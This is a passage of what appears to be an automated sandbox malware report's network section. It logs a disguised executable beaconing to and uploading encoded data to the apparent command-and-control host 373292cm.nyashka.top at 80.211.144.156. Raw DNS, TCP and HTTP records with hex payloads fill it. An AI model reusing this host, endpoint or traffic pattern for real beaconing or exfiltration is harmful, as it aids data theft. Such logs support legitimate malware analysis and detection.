                                    Aug 25, 2024 15:47:05.047053099 CEST804980980.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.047136068 CEST4980980192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.047148943 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.047229052 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.052057981 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.402195930 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.410562038 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.411101103 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.411112070 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.743324041 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.792659044 CEST4981080192.168.2.880.211.144.156
                                    Aug 25, 2024 15:47:05.942663908 CEST804981080.211.144.156192.168.2.8
                                    Aug 25, 2024 15:47:05.995727062 CEST4981080192.168.2.880.211.144.156
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 25, 2024 15:45:43.624114990 CEST | 53123 | 53 | 192.168.2.8 | 1.1.1.1
                                    Aug 25, 2024 15:45:43.815149069 CEST | 53 | 53123 | 1.1.1.1 | 192.168.2.8

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Aug 25, 2024 15:45:43.624114990 CEST | 192.168.2.8 | 1.1.1.1 | 0xbdee | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Aug 25, 2024 15:45:43.815149069 CEST | 1.1.1.1 | 192.168.2.8 | 0xbdee | No error (0) | 373292cm.nyashka.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false
                                    • 373292cm.nyashka.top
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.8 | 49707 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe

                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:43.853141069 CEST | 345 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:44.549909115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:44.648998022 CEST | 1236 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 1320
                                    Connection: keep-alive
                                    Aug 25, 2024 15:45:44.680274963 CEST | 321 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 384
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:44.891242027 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:45.190363884 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.8 | 49708 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe

                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:44.873883963 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:45.548530102 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:45.747013092 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    2 | 192.168.2.8 | 49711 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe

                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:45.339277029 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:45.683351994 CEST1860OUTData Raw: 5f 52 59 53 51 47 51 5e 5b 5f 5a 51 59 5e 58 57 57 5e 5d 52 57 58 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _RYSQGQ^[_ZQY^XWW^]RWXSYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.]/!8\ #%>4Y+>5_)>;\4,#0S*)8" /.&F$.Y/
                                    Aug 25, 2024 15:45:46.004705906 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:46.201056957 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1f 2a 0b 3e 11 26 5d 3c 18 24 0a 31 0f 2b 3e 23 12 3e 03 25 14 25 28 35 5c 25 10 24 50 24 3b 29 58 2b 3d 2d 0f 26 3f 2f 11 2d 24 2b 5d 0c 13 21 07 34 39 39 04 26 2c 20 13 29 28 0a 06 21 02 21 02 3f 03 3d 18 2b 2c 23 02 28 5f 27 1e 2a 2a 04 57 2f 16 07 5a 2d 09 3a 55 23 3e 2b 52 0d 11 24 55 2b 13 3d 54 3e 58 2b 5d 36 06 3b 58 27 5b 3d 0e 32 32 2e 1d 33 2a 3c 58 32 31 3d 51 33 1f 36 0d 26 5d 3e 12 25 2f 0f 50 23 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &*>&]<$1+>#>%%(5\%$P$;)X+=-&?/-$+]!499&, )(!!?=+,#(_'**W/Z-:U#>+R$U+=T>X+]6;X'[=22.3*<X21=Q36&]>%/P#2#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    3 | 192.168.2.8 | 49712 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:45.979459047 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:46.323940992 CEST2544OUTData Raw: 5a 56 5c 5e 54 42 54 5f 5b 5f 5a 51 59 51 58 56 57 5d 5d 59 57 50 53 5b 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\^TBT_[_ZQYQXVW]]YWPS[YY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-,3;E">+40Z)-,(=)\([ #< +3_# !Y;>&F$.Y/=
                                    Aug 25, 2024 15:45:46.655853033 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:46.791594028 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    4 | 192.168.2.8 | 49714 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:47.247595072 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:47.606041908 CEST2536OUTData Raw: 5f 57 5c 52 54 40 54 5e 5b 5f 5a 51 59 57 58 53 57 5d 5d 5f 57 5c 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _W\RT@T^[_ZQYWXSW]]_W\SUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y,0"- 4=Z+><Y(>"?[+[4# 1$W+*;^4%Y,&F$.Y/5
                                    Aug 25, 2024 15:45:47.927711010 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:48.127664089 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    5 | 192.168.2.8 | 49715 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:48.437699080 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:48.792576075 CEST2544OUTData Raw: 5a 57 59 52 54 49 54 59 5b 5f 5a 51 59 52 58 5e 57 51 5d 5b 57 50 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZWYRTITY[_ZQYRX^WQ][WPSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.;?6'75>(^>-=[<.?Y < 4$*)?^"3!_,.&F$.Y/1
                                    Aug 25, 2024 15:45:49.110965014 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:49.239625931 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    6 | 192.168.2.8 | 49717 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:49.450839043 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    7 | 192.168.2.8 | 49718 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:49.728526115 CEST | 348 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 152740
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:50.393665075 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:50.607156038 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:51.210525036 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[
                                    Aug 25, 2024 15:45:51.215044022 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1860
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:51.421960115 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:52.018244982 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 54 29 1c 22 5a 32 02 27 08 25 23 08 10 2a 03 05 5b 3e 3e 36 04 25 3b 35 14 27 3e 2b 0f 24 3b 25 5d 28 3d 29 0a 25 3f 30 03 3a 34 2b 5d 0c 13 21 07 34 04 36 5a 31 2c 20 5c 2a 38 05 5e 21 5a 3e 5a 2b 3a 07 52 28 3f 27 03 28 3a 3c 01 3c 3a 2a 57 38 06 21 5c 39 09 26 55 23 3e 2b 52 0d 11 24 52 3c 03 31 1e 29 2e 16 04 22 2b 33 59 27 03 0f 0f 26 1c 2a 52 27 17 33 03 26 0c 2a 0d 25 21 3d 55 32 38 35 01 32 2c 25 55 22 08 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &T)"Z2'%#*[>>6%;5'>+$;%](=)%?0:4+]!46Z1, \*8^!Z>Z+:R(?'(:<<:*W8!\9&U#>+R$R<1)."+3Y'&*R'3&*%!=U2852,%U"#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    8 | 192.168.2.8 | 49719 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:50.013055086 CEST | 346 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:45:50.374258995 CEST2544OUTData Raw: 5f 56 5c 55 51 40 51 5b 5b 5f 5a 51 59 56 58 50 57 5d 5d 5e 57 58 53 5a 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _V\UQ@Q[[_ZQYVXPW]]^WXSZYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q..30"=<#0&==/?.+>'Y#<7*)3^# %;&F$.Y/!
                                    Aug 25, 2024 15:45:50.681253910 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:50.879744053 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    9 | 192.168.2.8 | 49721 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:51.036189079 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:51.386404037 CEST2544OUTData Raw: 5f 50 5c 5e 51 42 54 5d 5b 5f 5a 51 59 52 58 51 57 51 5d 53 57 5d 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _P\^QBT][_ZQYRXQWQ]SW]SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.8#@6-$_ 3!=[#+>9_+>$4?<#'*)4#0*,&F$.Y/1
                                    Aug 25, 2024 15:45:51.725287914 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:51.916224957 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    10 | 192.168.2.8 | 49722 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:52.047452927 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:52.402631998 CEST2544OUTData Raw: 5f 51 5c 52 54 41 51 5a 5b 5f 5a 51 59 51 58 53 57 5e 5d 5c 57 5e 53 59 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _Q\RTAQZ[_ZQYQXSW^]\W^SYYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q._;#6=X4)^(\(-7[ #1V?9^"#)/.&F$.Y/=
                                    Aug 25, 2024 15:45:52.754246950 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:52.887603998 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    11 | 192.168.2.8 | 49723 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:53.087724924 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2536
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:53.437021971 CEST2536OUTData Raw: 5a 56 5c 56 51 40 54 5d 5b 5f 5a 51 59 57 58 50 57 59 5d 53 57 51 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: ZV\VQ@T][_ZQYWXPWY]SWQSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q.Y/U<"-_7&='?.]?=47#<W+9+#%^.>&F$.Y/
                                    Aug 25, 2024 15:45:53.771286011 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:53.901833057 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    12 | 192.168.2.8 | 49725 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:45:54.028970957 CEST | 322 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2544
                                    Expect: 100-continue
                                    Aug 25, 2024 15:45:54.386437893 CEST2544OUTData Raw: 5f 55 59 54 51 40 54 5c 5b 5f 5a 51 59 55 58 51 57 58 5d 59 57 5a 53 55 59 59 5f 55 5e 5b 5a 51 5a 5a 52 5e 50 5b 50 55 58 5e 5c 5f 50 53 51 5a 5f 5b 58 5c 5d 5b 55 5a 58 5d 53 5a 57 59 50 5a 5c 5d 5c 5b 50 5f 57 51 42 5e 5a 5a 47 5c 5d 5f 53 5f
                                    Data Ascii: _UYTQ@T\[_ZQYUXQWX]YWZSUYY_U^[ZQZZR^P[PUX^\_PSQZ_[X\][UZX]SZWYPZ\]\[P_WQB^ZZG\]_S_TRRYZ^VUUW^ZQP^Y^WPZ[WQ[AZ_YYSZXXTX_XUZT_Z^WFWYP_WX]TZ[\_SZ@YVVP[WTZV^Y\BXT^^WG[]W]XXTZXRY^XYQFZYX_V^Q-/06-07[+-+-6?>(4!!<Q**<49_;>&F$.Y/-
                                    Aug 25, 2024 15:45:54.739362955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:45:54.870296955 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:45:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    13 | 192.168.2.8 | 49726 | 80.211.144.156 | 80 | 4536 | C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Timestamp | Bytes transferred | Direction | Data
